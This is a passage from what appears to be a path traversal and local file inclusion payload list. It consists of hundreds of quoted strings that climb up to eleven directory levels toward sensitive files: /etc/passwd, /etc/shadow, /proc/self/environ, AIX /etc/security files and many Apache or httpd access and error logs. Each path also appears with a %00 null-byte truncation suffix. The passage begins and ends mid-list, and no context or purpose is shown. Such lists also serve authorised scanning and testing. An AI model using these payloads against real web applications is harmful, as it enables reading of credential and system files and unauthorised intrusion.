./etc/passwd',
'../../etc/passwd',
'../../../etc/passwd',
'../../../../etc/passwd',
'../../../../../etc/passwd',
'../../../../../../etc/passwd',
'../../../../../../../etc/passwd',
'../../../../../../../../etc/passwd',
'../../../../../../../../../etc/passwd',
'../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../etc/passwd',
'../etc/passwd%00',
'../../etc/passwd%00',
'../../../etc/passwd%00',
'../../../../etc/passwd%00',
'../../../../../etc/passwd%00',
'../../../../../../etc/passwd%00',
'../../../../../../../etc/passwd%00',
'../../../../../../../../etc/passwd%00',
'../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../etc/passwd%00',
'/proc/self/environ',
'../proc/self/environ',
'../../proc/self/environ',
'../../../proc/self/environ',
'../../../../proc/self/environ',
'../../../../../proc/self/environ',
'../../../../../../proc/self/environ',
'../../../../../../../proc/self/environ',
'../../../../../../../../proc/self/environ',
'../../../../../../../../../proc/self/environ',
'../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../proc/self/environ',
'/proc/self/environ%00',
'../proc/self/environ%00',
'../../proc/self/environ%00',
'../../../proc/self/environ%00',
'../../../../proc/self/environ%00',
'../../../../../proc/self/environ%00',
'../../../../../../proc/self/environ%00',
'../../../../../../../proc/self/environ%00',
'../../../../../../../../proc/self/environ%00',
'../../../../../../../../../proc/self/environ%00',
'../../../../../../../../../../proc/self/environ%00',
'../../../../../../../../../../../proc/self/environ%00',
'/etc/group',
'../etc/group',
'../../etc/group',
'../../../etc/group',
'../../../../etc/group',
'../../../../../etc/group',
'../../../../../../etc/group',
'../../../../../../../etc/group',
'../../../../../../../../etc/group',
'../../../../../../../../../etc/group',
'../../../../../../../../../../etc/group',
'../../../../../../../../../../../etc/group',
'/etc/group%00',
'../etc/group%00',
'../../etc/group%00',
'../../../etc/group%00',
'../../../../etc/group%00',
'../../../../../etc/group%00',
'../../../../../../etc/group%00',
'../../../../../../../etc/group%00',
'../../../../../../../../etc/group%00',
'../../../../../../../../../etc/group%00',
'../../../../../../../../../../etc/group%00',
'../../../../../../../../../../../etc/group%00',
'/etc/security/group',
'../etc/security/group',
'../../etc/security/group',
'../../../etc/security/group',
'../../../../etc/security/group',
'../../../../../etc/security/group',
'../../../../../../etc/security/group',
'../../../../../../../etc/security/group',
'../../../../../../../../etc/security/group',
'../../../../../../../../../etc/security/group',
'../../../../../../../../../../etc/security/group',
'../../../../../../../../../../../etc/security/group',
'/etc/security/group%00',
'../etc/security/group%00',
'../../etc/security/group%00',
'../../../etc/security/group%00',
'../../../../etc/security/group%00',
'../../../../../etc/security/group%00',
'../../../../../../etc/security/group%00',
'../../../../../../../etc/security/group%00',
'../../../../../../../../etc/security/group%00',
'../../../../../../../../../etc/security/group%00',
'../../../../../../../../../../etc/security/group%00',
'../../../../../../../../../../../etc/security/group%00',
'/etc/user',
'../etc/user',
'../../etc/user',
'../../../etc/user',
'../../../../etc/user',
'../../../../../etc/user',
'../../../../../../etc/user',
'../../../../../../../etc/user',
'../../../../../../../../etc/user',
'../../../../../../../../../etc/user',
'../../../../../../../../../../etc/user',
'../../../../../../../../../../../etc/user',
'/etc/user%00',
'../etc/user%00',
'../../etc/user%00',
'../../../etc/user%00',
'../../../../etc/user%00',
'../../../../../etc/user%00',
'../../../../../../etc/user%00',
'../../../../../../../etc/user%00',
'../../../../../../../../etc/user%00',
'../../../../../../../../../etc/user%00',
'../../../../../../../../../../etc/user%00',
'../../../../../../../../../../../etc/user%00',
'/etc/shadow',
'../etc/shadow',
'../../etc/shadow',
'../../../etc/shadow',
'../../../../etc/shadow',
'../../../../../etc/shadow',
'../../../../../../etc/shadow',
'../../../../../../../etc/shadow',
'../../../../../../../../etc/shadow',
'../../../../../../../../../etc/shadow',
'../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../etc/shadow',
'/etc/shadow%00',
'../etc/shadow%00',
'../../etc/shadow%00',
'../../../etc/shadow%00',
'../../../../etc/shadow%00',
'../../../../../etc/shadow%00',
'../../../../../../etc/shadow%00',
'../../../../../../../etc/shadow%00',
'../../../../../../../../etc/shadow%00',
'../../../../../../../../../etc/shadow%00',
'../../../../../../../../../../etc/shadow%00',
'../../../../../../../../../../../etc/shadow%00',
'/etc/security/passwd',
'../etc/security/passwd',
'../../etc/security/passwd',
'../../../etc/security/passwd',
'../../../../etc/security/passwd',
'../../../../../etc/security/passwd',
'../../../../../../etc/security/passwd',
'../../../../../../../etc/security/passwd',
'../../../../../../../../etc/security/passwd',
'../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../etc/security/passwd',
'/etc/security/passwd%00',
'../etc/security/passwd%00',
'../../etc/security/passwd%00',
'../../../etc/security/passwd%00',
'../../../../etc/security/passwd%00',
'../../../../../etc/security/passwd%00',
'../../../../../../etc/security/passwd%00',
'../../../../../../../etc/security/passwd%00',
'../../../../../../../../etc/security/passwd%00',
'../../../../../../../../../etc/security/passwd%00',
'../../../../../../../../../../etc/security/passwd%00',
'../../../../../../../../../../../etc/security/passwd%00',
'/etc/security/user',
'../etc/security/user',
'../../etc/security/user',
'../../../etc/security/user',
'../../../../etc/security/user',
'../../../../../etc/security/user',
'../../../../../../etc/security/user',
'../../../../../../../etc/security/user',
'../../../../../../../../etc/security/user',
'../../../../../../../../../etc/security/user',
'../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../etc/security/user',
'/etc/security/user%00',
'../etc/security/user%00',
'../../etc/security/user%00',
'../../../etc/security/user%00',
'../../../../etc/security/user%00',
'../../../../../etc/security/user%00',
'../../../../../../etc/security/user%00',
'../../../../../../../etc/security/user%00',
'../../../../../../../../etc/security/user%00',
'../../../../../../../../../etc/security/user%00',
'../../../../../../../../../../etc/security/user%00',
'../../../../../../../../../../../etc/security/user%00',
'/etc/security/environ',
'../etc/security/environ',
'../../etc/security/environ',
'../../../etc/security/environ',
'../../../../etc/security/environ',
'../../../../../etc/security/environ',
'../../../../../../etc/security/environ',
'../../../../../../../etc/security/environ',
'../../../../../../../../etc/security/environ',
'../../../../../../../../../etc/security/environ',
'../../../../../../../../../../etc/security/environ',
'../../../../../../../../../../../etc/security/environ',
'/etc/security/environ%00',
'../etc/security/environ%00',
'../../etc/security/environ%00',
'../../../etc/security/environ%00',
'../../../../etc/security/environ%00',
'../../../../../etc/security/environ%00',
'../../../../../../etc/security/environ%00',
'../../../../../../../etc/security/environ%00',
'../../../../../../../../etc/security/environ%00',
'../../../../../../../../../etc/security/environ%00',
'../../../../../../../../../../etc/security/environ%00',
'../../../../../../../../../../../etc/security/environ%00',
'/etc/security/limits',
'../etc/security/limits',
'../../etc/security/limits',
'../../../etc/security/limits',
'../../../../etc/security/limits',
'../../../../../etc/security/limits',
'../../../../../../etc/security/limits',
'../../../../../../../etc/security/limits',
'../../../../../../../../etc/security/limits',
'../../../../../../../../../etc/security/limits',
'../../../../../../../../../../etc/security/limits',
'../../../../../../../../../../../etc/security/limits',
'/etc/security/limits%00',
'../etc/security/limits%00',
'../../etc/security/limits%00',
'../../../etc/security/limits%00',
'../../../../etc/security/limits%00',
'../../../../../etc/security/limits%00',
'../../../../../../etc/security/limits%00',
'../../../../../../../etc/security/limits%00',
'../../../../../../../../etc/security/limits%00',
'../../../../../../../../../etc/security/limits%00',
'../../../../../../../../../../etc/security/limits%00',
'../../../../../../../../../../../etc/security/limits%00',
'/usr/lib/security/mkuser.default',
'../usr/lib/security/mkuser.default',
'../../usr/lib/security/mkuser.default',
'../../../usr/lib/security/mkuser.default',
'../../../../usr/lib/security/mkuser.default',
'../../../../../usr/lib/security/mkuser.default',
'../../../../../../usr/lib/security/mkuser.default',
'../../../../../../../usr/lib/security/mkuser.default',
'../../../../../../../../usr/lib/security/mkuser.default',
'../../../../../../../../../usr/lib/security/mkuser.default',
'../../../../../../../../../../usr/lib/security/mkuser.default',
'../../../../../../../../../../../usr/lib/security/mkuser.default',
'/usr/lib/security/mkuser.default%00',
'../usr/lib/security/mkuser.default%00',
'../../usr/lib/security/mkuser.default%00',
'../../../usr/lib/security/mkuser.default%00',
'../../../../usr/lib/security/mkuser.default%00',
'../../../../../usr/lib/security/mkuser.default%00',
'../../../../../../usr/lib/security/mkuser.default%00',
'../../../../../../../usr/lib/security/mkuser.default%00',
'../../../../../../../../usr/lib/security/mkuser.default%00',
'../../../../../../../../../usr/lib/security/mkuser.default%00',
'../../../../../../../../../../usr/lib/security/mkuser.default%00',
'../../../../../../../../../../../usr/lib/security/mkuser.default%00',
'/apache/logs/access.log',
'../apache/logs/access.log',
'../../apache/logs/access.log',
'../../../apache/logs/access.log',
'../../../../apache/logs/access.log',
'../../../../../apache/logs/access.log',
'../../../../../../apache/logs/access.log',
'../../../../../../../apache/logs/access.log',
'../../../../../../../../apache/logs/access.log',
'../../../../../../../../../apache/logs/access.log',
'../../../../../../../../../../apache/logs/access.log',
'../../../../../../../../../../../apache/logs/access.log',
'/apache/logs/access.log%00',
'../apache/logs/access.log%00',
'../../apache/logs/access.log%00',
'../../../apache/logs/access.log%00',
'../../../../apache/logs/access.log%00',
'../../../../../apache/logs/access.log%00',
'../../../../../../apache/logs/access.log%00',
'../../../../../../../apache/logs/access.log%00',
'../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../../../apache/logs/access.log%00',
'/apache/logs/error.log',
'../apache/logs/error.log',
'../../apache/logs/error.log',
'../../../apache/logs/error.log',
'../../../../apache/logs/error.log',
'../../../../../apache/logs/error.log',
'../../../../../../apache/logs/error.log',
'../../../../../../../apache/logs/error.log',
'../../../../../../../../apache/logs/error.log',
'../../../../../../../../../apache/logs/error.log',
'../../../../../../../../../../apache/logs/error.log',
'../../../../../../../../../../../apache/logs/error.log',
'/apache/logs/error.log%00',
'../apache/logs/error.log%00',
'../../apache/logs/error.log%00',
'../../../apache/logs/error.log%00',
'../../../../apache/logs/error.log%00',
'../../../../../apache/logs/error.log%00',
'../../../../../../apache/logs/error.log%00',
'../../../../../../../apache/logs/error.log%00',
'../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../../../apache/logs/error.log%00',
'/etc/httpd/logs/acces_log',
'../etc/httpd/logs/acces_log',
'../../etc/httpd/logs/acces_log',
'../../../etc/httpd/logs/acces_log',
'../../../../etc/httpd/logs/acces_log',
'../../../../../etc/httpd/logs/acces_log',
'../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../../../../../etc/httpd/logs/acces_log',
'/etc/httpd/logs/acces_log%00',
'../etc/httpd/logs/acces_log%00',
'../../etc/httpd/logs/acces_log%00',
'../../../etc/httpd/logs/acces_log%00',
'../../../../etc/httpd/logs/acces_log%00',
'../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../../../../etc/httpd/logs/acces_log%00',
'/etc/httpd/logs/error_log',
'../etc/httpd/logs/error_log',
'../../etc/httpd/logs/error_log',
'../../../etc/httpd/logs/error_log',
'../../../../etc/httpd/logs/error_log',
'../../../../../etc/httpd/logs/error_log',
'../../../../../../etc/httpd/logs/error_log',
'../../../../../../../etc/httpd/logs/error_log',
'../../../../../../../../etc/httpd/logs/error_log',
'../../../../../../../../../etc/httpd/logs/error_log',
'../../../../../../../../../../etc/httpd/logs/error_log',
'../../../../../../../../../../../etc/httpd/logs/error_log',
'/etc/httpd/logs/error_log%00',
'../etc/httpd/logs/error_log%00',
'../../etc/httpd/logs/error_log%00',
'../../../etc/httpd/logs/error_log%00',
'../../../../etc/httpd/logs/error_log%00',
'../../../../../etc/httpd/logs/error_log%00',
'../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../../../etc/httpd/logs/error_log%00',
'/var/www/logs/access_log',
'../var/www/logs/access_log',
'../../var/www/logs/access_log',
'../../../var/www/logs/access_log',
'../../../../var/www/logs/access_log',
'../../../../../var/www/logs/access_log',
'../../../../../../var/www/logs/access_log',
'../../../../../../../var/www/logs/access_log',
'../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../../../var/www/logs/access_log',
'/var/www/logs/access_log%00',
'../var/www/logs/access_log%00',
'../../var/www/logs/access_log%00',
'../../../var/www/logs/access_log%00',
'../../../../var/www/logs/access_log%00',
'../../../../../var/www/logs/access_log%00',
'../../../../../../var/www/logs/access_log%00',
'../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../../../../var/www/logs/access_log%00',
'/var/www/logs/error_log',
'../var/www/logs/error_log',
'../../var/www/logs/error_log',
'../../../var/www/logs/error_log',
'../../../../var/www/logs/error_log',
'../../../../../var/www/logs/error_log',
'../../../../../../var/www/logs/error_log',
'../../../../../../../var/www/logs/error_log',
'../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../../../var/www/logs/error_log',
'/var/www/logs/error_log%00',
'../var/www/logs/error_log%00',
'../../var/www/logs/error_log%00',
'../../../var/www/logs/error_log%00',
'../../../../var/www/logs/error_log%00',
'../../../../../var/www/logs/error_log%00',
'../../../../../../var/www/logs/error_log%00',
'../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../../../../var/www/logs/error_log%00',
'/usr/local/apache/logs/access_ log',
'../usr/local/apache/logs/access_ log',
'../../usr/local/apache/logs/access_ log',
'../../../usr/local/apache/logs/access_ log',
'../../../../usr/local/apache/logs/access_ log',
'../../../../../usr/local/apache/logs/access_ log',
'../../../../../../usr/local/apache/logs/access_ log',
'../../../../../../../usr/local/apache/logs/access_ log',
'../../../../../../../../usr/local/apache/logs/access_ log',
'../../../../../../../../../usr/local/apache/logs/access_ log',
'../../../../../../../../../../usr/local/apache/logs/access_ log',
'../../../../../../../../../../../usr/local/apache/logs/access_ log',
'/usr/local/apache/logs/access_ log%00',
'../usr/local/apache/logs/access_ log%00',
'../../usr/local/apache/logs/access_ log%00',
'../../../usr/local/apache/logs/access_ log%00',
'../../../../usr/local/apache/logs/access_ log%00',
'../../../../../usr/local/apache/logs/access_ log%00',
'../../../../../../usr/local/apache/logs/access_ log%00',
'../../../../../../../usr/local/apache/logs/access_ log%00',
'../../../../../../../../usr/local/apache/logs/access_ log%00',
'../../../../../../../../../usr/local/apache/logs/access_ log%00',
'../../../../../../../../../../usr/local/apache/logs/access_ log%00',
'../../../../../../../../../../../usr/local/apache/logs/access_ log%00',
'/usr/local/apache/logs/error_ log',
'../usr/local/apache/logs/error_ log',
'../../usr/local/apache/logs/error_ log',
'../../../usr/local/apache/logs/error_ log',
'../../../../usr/local/apache/logs/error_ log',
'../../../../../usr/local/apache/logs/error_ log',
'../../../../../../usr/local/apache/logs/error_ log',
'../../../../../../../usr/local/apache/logs/error_ log',
'../../../../../../../../usr/local/apache/logs/error_ log',
'../../../../../../../../../usr/local/apache/logs/error_ log',
'../../../../../../../../../../usr/local/apache/logs/error_ log',
'../../../../../../../../../../../usr/local/apache/logs/error_ log',
'/usr/local/apache/logs/error_ log%00',
'../usr/local/apache/logs/error_ log%00',
'../../usr/local/apache/logs/error_ log%00',
'../../../usr/local/apache/logs/error_ log%00',
'../../../../usr/local/apache/logs/error_ log%00',
'../../../../../usr/local/apache/logs/error_ log%00',
'../../../../../../usr/local/apache/logs/error_ log%00',
'../../../../../../../usr/local/apache/logs/error_ log%00',
'../../../../../../../../usr/local/apache/logs/error_ log%00',
'../../../../../../../../../usr/local/apache/logs/error_ log%00',
'../../../../../../../../../../usr/local/apache/logs/error_ log%00',
'../../../../../../../../../../../usr/local/apache/logs/error_ log%00',
'/var/log/apache/access_log',
'../var/log/apache/access_log',
'../../var/log/apache/access_log',
'../../../var/log/apache/access_log',
'../../../../var/log/apache/access_log',
'../../../../../var/log/apache/access_log',
'../../../../../../var/log/apache/access_log',
'../../../../../../../var/log/apache/access_log',
'../../../../../../../../var/log/apache/access_log',
'../../../../../../../../../var/log/apache/access_log',
'../../../../../../../../../../var/log/apache/access_log',
'../../../../../../../../../../../var/log/apache/access_log',
'/var/log/apache/access_log%00',
'../var/log/apache/access_log%00',
'../../var/log/apache/access_log%00',
'../../../var/log/apache/access_log%00',
'../../../../var/log/apache/access_log%00',
'../../../../../var/log/apache/access_log%00',
'../../../../../../var/log/apache/access_log%00',
'../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../../../../var/log/apache/access_log%00',
'/var/log/apache/error_log',
'../var/log/apache/error_log',
'../../var/log/apache/error_log',
'../../../var/log/apache/error_log',
'../../../../var/log/apache/error_log',
'../../../../../var/log/apache/error_log',
'../../../../../../var/log/apache/error_log',
'../../../../../../../var/log/apache/error_log',
'../../../../../../../../var/log/apache/error_log',
'../../../../../../../../../var/log/apache/error_log',
'../../../../../../../../../../var/log/apache/error_log',
'../../../../../../../../../../../var/log/apache/error_log',
'/var/log/apache/error_log%00',
'../var/log/apache/error_log%00',
'../../var/log/apache/error_log%00',
'../../../var/log/apache/error_log%00',
'../../../../var/log/apache/error_log%00',
'../../../../../var/log/apache/error_log%00',
'../../../../../../var/log/apache/error_log%00',
'../../../../../../../var/log/apache/error_log%00',
'../../../../../../../../var/log/apache/error_log%00',
'../../../../../../../../../var/log/apache/error_log%00',
'../../../../../../../../../../var/log/apache/error_log%00',
'../../../../../../../../../../../var/log/apache/error_log%00',
'/var/log/apache2/error_log',
'../var/log/apache2/error_log',
'../../var/log/apache2/error_log',
'../../../var/log/apache2/error_log',
'../../../../var/log/apache2/error_log',
'../../../../../var/log/apache2/error_log',
'../../../../../../var/log/apache2/error_log',
'../../../../../../../var/log/apache2/error_log',
'../../../../../../../../var/log/apache2/error_log',
'../../../../../../../../../var/log/apache2/error_log',
'../../../../../../../../../../var/log/apache2/error_log',
'../../../../../../../../../../../var/log/apache2/error_log',
'/var/log/apache2/error_log%00',
'../var/log/apache2/error_log%00',
'../../var/log/apache2/error_log%00',
'../../../var/log/apache2/error_log%00',
'../../../../var/log/apache2/error_log%00',
'../../../../../var/log/apache2/error_log%00',
'../../../../../../var/log/apache2/error_log%00',
'../../../../../../../var/log/apache2/error_log%00',
'../../../../../../../../var/log/apache2/error_log%00',
'../../../../../../../../../var/log/apache2/error_log%00',
'../../../../../../../../../../var/log/apache2/error_log%00',
'../../../../../../../../../../../var/log/apache2/error_log%00',
'/var/log/apache2/access_log',
'../var/log/apache2/access_log',
'../../var/log/apache2/access_log',
'../../../var/log/apache2/access_log',
'../../../../var/log/apache2/access_log',
'../../../../../var/log/apache2/access_log',
'../../../../../../var/log/apache2/access_log',
'../../../../../../../var/log/apache2/access_log',
'../../../../../../../../var/log/apache2/access_log',
'../../../../../../../../../var/log/apache2/access_log',
'../../../../../../../../../../var/log/apache2/access_log',
'../../../../../../../../../../../var/log/apache2/access_log',
'/var/log/apache2/access_log%00',
'../var/log/apache2/access_log%00',
'../../var/log/apache2/access_log%00',
'../../../var/log/apache2/access_log%00',
'../../../../var/log/apache2/access_log%00',
'../../../../../var/log/apache2/access_log%00',
'../../../../../../var/log/apache2/access_log%00',
'../../../../../../../var/log/apache2/access_log%00',
'../../../../../../../../var/log/apache2/access_log%00',
'../../../../../../../../../var/log/apache2/access_log%00',
'../../../../../../../../../../var/log/apache2/access_log%00',
'../../../../../../../../../../../var/log/apache2/access_log%00',
'/var/log/access_log',
'../var/log/access_log',
'../../var/log/access_log',
'../../../var/log/access_log',
'../../../../var/log/access_log',
'../../../../../var/log/access_log',
'../../../../../../var/log/access_log',
'../../../../../../../var/log/access_log',
'../../../../../../../../var/log/access_log',
'../../../../../../../../../var/log/access_log',
'../../../../../../../../../../var/log/access_log',
'../../../../../../../../../../../var/log/access_log',
'/var/log/access_log%00',
'../var/log/access_log%00',
'../../var/log/access_log%00',
'../../../var/log/access_log%00',
'../../../../var/log/access_log%00',
'../../../../../var/log/access_log%00',
'../../../../../../var/log/access_log%00',
'../../../../../../../var/log/access_log%00',
'../../../../../../../../var/log/access_log%00',
'../../../../../../../../../var/log/access_log%00',
'../../../../../../../../../../var/log/access_log%00',
'../../../../../../../../../../../var/log/access_log%00',
'/var/log/error_log',
'../var/log/error_log',
'../../var/log/error_log',
'../../../var/log/error_log',
'../../../../var/log/error_log',
'../../../../../var/log/error_log',
'../../../../../../var/log/error_log',
'../../../../../../../var/log/error_log',
'../../../../../../../../var/log/error_log',
'../../../../../../../../../var/log/error_log',
'../../../../../../../../../../var/log/error_log',
'../../../../../../../../../../../var/log/error_log',
'/var/log/error_log%00',
'../var/log/error_log%00',
'../../var/log/error_log%00',
'../../../var/log/error_log%00',
'../../../../var/log/error_log%00',
'../../../../../var/log/error_log%00',
'../../../../../../var/log/error_log%00',
'../../../../../../../var/log/error_log%00',
'../../../../../../../../var/log/error_log%00',
'../../../../../../../../../var/log/error_log%00',
'../../../../../../../../../../var/log/error_log%00',
'../../../../../../../../../../../var/log/error_log%00',
'/var/www/logs/error_log',
'../var/www/logs/error_log',
'../../var/www/logs/error_log',
'../../../var/www/logs/error_log',
'../../../../var/www/logs/error_log',
'../../../../../var/www/logs/error_log',
'../../../../../../var/www/logs/error_log',
'../../../../../../../var/www/logs/error_log',
'../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../../../var/www/logs/error_log',
'/var/www/logs/error_log%00',
'../var/www/logs/error_log%00',
'../../var/www/logs/error_log%00',
'../../../var/www/logs/error_log%00',
'../../../../var/www/logs/error_log%00',
'../../../../../var/www/logs/error_log%00',
'../../../../../../var/www/logs/error_log%00',
'../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../../../../var/www/logs/error_log%00',
'/var/www/logs/access_log',
'../var/www/logs/access_log',
'../../var/www/logs/access_log',
'../../../var/www/logs/access_log',
'../../../../var/www/logs/access_log',
'../../../../../var/www/logs/access_log',
'../../../../../../var/www/logs/access_log',
'../../../../../../../var/www/logs/access_log',
'../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../../../var/www/logs/access_log',
'/var/www/logs/access_log%00',
'../var/www/logs/access_log%00',
'../../var/www/logs/access_log%00',
'../../../var/www/logs/access_log%00',
'../../../../var/www/logs/access_log%00',
'../../../../../var/www/logs/access_log%00',
'../../../../../../var/www/logs/access_log%00',
'../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../../../../var/www/logs/access_log%00',
'/usr/local/apache/logs/error_log',
'../usr/local/apache/logs/error_log',
'../../usr/local/apache/logs/error_log',
'../../../usr/local/apache/logs/error_log',
'../../../../usr/local/apache/logs/error_log',
'../../../../../usr/local/apache/logs/error_log',
'../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../../../../../usr/local/apache/logs/error_log',
'/usr/local/apache/logs/error_log%00',
'../usr/local/apache/logs/error_log%00',
'../../usr/local/apache/logs/error_log%00',
'../../../usr/local/apache/logs/error_log%00',
'../../../../usr/local/apache/logs/error_log%00',
'../../../../../usr/local/apache/logs/error_log%00',
'../../../../../../usr/local/apache/logs/error_log%00',
'../../../../../../../usr/local/apache/logs/error_log%00',
'../../../../../../../../usr/local/apache/logs/error_log%00',
'../../../../../../../../../usr/local/apache/logs/error_log%00',
'../../../../../../../../../../usr/local/apache/logs/error_log%00',
'../../../../../../../../../../../usr/local/apache/logs/error_log%00',
'/var/log/httpd/access_log',
'../var/log/httpd/access_log',
'../../var/log/httpd/access_log',
'../../../var/log/httpd/access_log',
'../../../../var/log/httpd/access_log',
'../../../../../var/log/httpd/access_log',
'../../../../../../var/log/httpd/access_log',
'../../../../../../../var/log/httpd/access_log',
'../../../../../../../../var/log/httpd/access_log',
'../../../../../../../../../var/log/httpd/access_log',
'../../../../../../../../../../var/log/httpd/access_log',
'../../../../../../../../../../../var/log/httpd/access_log',
'/var/log/httpd/access_log%00',
'../var/log/httpd/access_log%00',
'../../var/log/httpd/access_log%00',
'../../../var/log/httpd/access_log%00',
'../../../../var/log/httpd/access_log%00',
'../../../../../var/log/httpd/access_log%00',
'../../../../../../var/log/httpd/access_log%00',
'../../../../../../../var/log/httpd/access_log%00',
'../../../../../../../../var/log/httpd/access_log%00',
'../../../../../../../../../var/log/httpd/access_log%00',
'../../../../../../../../../../var/log/httpd/access_log%00',
'../../../../../../../../../../../var/log/httpd/access_log%00',
